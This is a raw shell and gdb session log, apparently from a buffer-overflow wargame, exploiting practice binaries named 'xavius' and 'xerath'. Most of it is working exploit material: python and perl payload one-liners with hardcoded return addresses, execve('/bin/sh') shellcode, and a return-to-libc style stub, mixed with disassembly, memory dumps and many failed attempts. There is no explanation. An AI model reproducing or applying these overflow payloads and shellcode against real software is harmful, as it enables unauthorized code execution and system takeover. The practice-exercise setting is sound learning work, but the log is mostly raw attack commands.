print "\xe0\x8a\x05\x40" +
^
SyntaxError: invalid syntax
[nightmare@localhost nightmare]$ $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" +
> "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" +
> "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')$(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
File "<string>", line 1
print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" +
^
SyntaxError: invalid syntax
File "<string>", line 1
print "\xe0\x8a\x05\x40" +
^
SyntaxError: invalid syntax
bash2: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAðú ¿fü ¿: command not found
[nightmare@localhost nightmare]$ $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
bash2: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAðú ¿fü ¿: command not found
[nightmare@localhost nightmare]$ ./xavius $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
[nightmare@localhost nightmare]$ ./xeratj $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
bash2: ./xeratj: No such file or directory
[nightmare@localhost nightmare]$ ./xerath $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ gdb -q xavius
(gdb) b main
Breakpoint 1 at 0x804871a
(gdb) r
Starting program: /home/nightmare/xavius
/bin/bash: /home/nightmare/xavius: Operation not permitted
/bin/bash: /home/nightmare/xavius: Operation not permitted
Program exited with code 01.
You can't do that without a process to debug.
(gdb) q
[nightmare@localhost nightmare]$ gdb -q xerath
(gdb) b main
Breakpoint 1 at 0x804871a
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb)
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 050.
(gdb) disas main
Dump of assembler code for function main:
0x8048714 <main>: push %ebp
0x8048715 <main+1>: mov %esp,%ebp
0x8048717 <main+3>: sub $0x2c,%esp
0x804871a <main+6>: mov 0x8049a3c,%eax
0x804871f <main+11>: push %eax
0x8048720 <main+12>: push $0x100
0x8048725 <main+17>: lea 0xffffffd8(%ebp),%eax
0x8048728 <main+20>: push %eax
0x8048729 <main+21>: call 0x8048408 <fgets>
0x804872e <main+26>: add $0xc,%esp
0x8048731 <main+29>: lea 0xffffffd8(%ebp),%eax
0x8048734 <main+32>: push %eax
0x8048735 <main+33>: push $0x80488bb
0x804873a <main+38>: call 0x8048438 <printf>
0x804873f <main+43>: add $0x8,%esp
0x8048742 <main+46>: cmpb $0xbf,0x7(%ebp)
0x8048746 <main+50>: jne 0x8048760 <main+76>
0x8048748 <main+52>: push $0x80488bf
0x804874d <main+57>: call 0x8048438 <printf>
0x8048752 <main+62>: add $0x4,%esp
0x8048755 <main+65>: push $0x0
0x8048757 <main+67>: call 0x8048458 <exit>
0x804875c <main+72>: add $0x4,%esp
0x804875f <main+75>: nop
0x8048760 <main+76>: cmpb $0x8,0x7(%ebp)
0x8048764 <main+80>: jne 0x8048780 <main+108>
0x8048766 <main+82>: push $0x80488e0
0x804876b <main+87>: call 0x8048438 <printf>
0x8048770 <main+92>: add $0x4,%esp
0x8048773 <main+95>: push $0x0
0x8048775 <main+97>: call 0x8048458 <exit>
0x804877a <main+102>: add $0x4,%esp
0x804877d <main+105>: lea 0x0(%esi),%esi
0x8048780 <main+108>: push $0x4
0x8048782 <main+110>: lea 0xffffffd8(%ebp),%eax
0x8048785 <main+113>: lea 0x2c(%eax),%edx
0x8048788 <main+116>: push %edx
0x8048789 <main+117>: lea 0xffffffd4(%ebp),%eax
0x804878c <main+120>: push %eax
0x804878d <main+121>: call 0x8048448 <memcpy>
0x8048792 <main+126>: add $0xc,%esp
0x8048795 <main+129>: push $0x2
0x8048797 <main+131>: push $0x8048902
0x804879c <main+136>: mov 0xffffffd4(%ebp),%eax
0x804879f <main+139>: push %eax
0x80487a0 <main+140>: call 0x8048418 <memcmp>
0x80487a5 <main+145>: add $0xc,%esp
0x80487a8 <main+148>: mov %eax,%eax
0x80487aa <main+150>: test %eax,%eax
0x80487ac <main+152>: jne 0x80487b0 <main+156>
0x80487ae <main+154>: jmp 0x80487e0 <main+204>
0x80487b0 <main+156>: mov 0xffffffd4(%ebp),%eax
0x80487b3 <main+159>: cmpb $0xc9,(%eax)
---Type <return> to continue, or q <return> to quit---
0x80487b6 <main+162>: jne 0x80487d8 <main+196>
0x80487b8 <main+164>: mov 0xffffffd4(%ebp),%eax
0x80487bb <main+167>: inc %eax
0x80487bc <main+168>: cmpb $0xc3,(%eax)
0x80487bf <main+171>: jne 0x80487d8 <main+196>
0x80487c1 <main+173>: push $0x8048920
0x80487c6 <main+178>: call 0x8048438 <printf>
0x80487cb <main+183>: add $0x4,%esp
0x80487ce <main+186>: push $0x0
0x80487d0 <main+188>: call 0x8048458 <exit>
0x80487d5 <main+193>: add $0x4,%esp
0x80487d8 <main+196>: incl 0xffffffd4(%ebp)
0x80487db <main+199>: jmp 0x8048795 <main+129>
0x80487dd <main+201>: lea 0x0(%esi),%esi
0x80487e0 <main+204>: push $0x2c
0x80487e2 <main+206>: push $0x0
0x80487e4 <main+208>: lea 0xffffffd8(%ebp),%eax
0x80487e7 <main+211>: push %eax
0x80487e8 <main+212>: call 0x8048468 <memset>
0x80487ed <main+217>: add $0xc,%esp
0x80487f0 <main+220>: lea 0xffffffd8(%ebp),%eax
0x80487f3 <main+223>: mov $0xbfffffcf,%edx
0x80487f8 <main+228>: mov %edx,%ecx
0x80487fa <main+230>: sub %eax,%ecx
0x80487fc <main+232>: mov %ecx,%eax
0x80487fe <main+234>: push %eax
0x80487ff <main+235>: push $0x0
0x8048801 <main+237>: lea 0xffffffd8(%ebp),%eax
0x8048804 <main+240>: lea 0x30(%eax),%edx
0x8048807 <main+243>: push %edx
0x8048808 <main+244>: call 0x8048468 <memset>
0x804880d <main+249>: add $0xc,%esp
0x8048810 <main+252>: push $0xb90
0x8048815 <main+257>: push $0x0
0x8048817 <main+259>: lea 0xffffffd8(%ebp),%eax
0x804881a <main+262>: lea 0xfffff448(%eax),%edx
0x8048820 <main+268>: push %edx
0x8048821 <main+269>: call 0x8048468 <memset>
0x8048826 <main+274>: add $0xc,%esp
0x8048829 <main+277>: leave
0x804882a <main+278>: ret
0x804882b <main+279>: nop
0x804882c <main+280>: nop
0x804882d <main+281>: nop
0x804882e <main+282>: nop
0x804882f <main+283>: nop
End of assembler dump.
(gdb) b *main+274
Breakpoint 2 at 0x8048826
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
You cannot use library function!
Program exited normally.
(gdb) ?
Undefined command: "". Try "help".
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Breakpoint 2, 0x8048826 in main ()
(gdb)
Continuing.
Program exited with code 050.
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb)
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Breakpoint 2, 0x8048826 in main ()
(gdb) x/wx 0x40015000
0x40015000: 0x61616161
(gdb) x/20wx 0x40015000
0x40015000: 0x61616161 0x61616161 0x61616161 0x61616161
0x40015010: 0x61616161 0x61616161 0x61616161 0x61616161
0x40015020: 0x000a6161 0x00000000 0x00000000 0x00000000
0x40015030: 0x00000000 0x00000000 0x00000000 0x00000000
0x40015040: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) ㅂ
Undefined command: "". Try "help".
(gdb) c
Continuing.
Program exited with code 050.
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb)
(gdb) c
Continuing.
Breakpoint 2, 0x8048826 in main ()
(gdb)
Continuing.
Program exited with code 050.
(gdb) r (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
Starting program: /home/nightmare/xerath (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
/bin/bash: syntax error near unexpected token `(p'
/bin/bash: -c: line 1: `exec /home/nightmare/xerath (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath'
Program exited with code 02.
You can't do that without a process to debug.
(gdb) (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
Undefined command: "". Try "help".
(gdb) q
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
j
XRh//shh/binRSÍ̀
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"';cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"';cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare여
bash2: 여: command not found
[nightmare@localhost nightmare]$ difference xavius xerath
bash2: difference: command not found
[nightmare@localhost nightmare]$ diff xavius xerath
[nightmare@localhost nightmare]$ cp xavius xxxxxx
[nightmare@localhost nightmare]$(perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"';cat)|./xxxxxx
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"';cat)|./xavius
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ;cat)|./xavius
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xavius
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
id
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$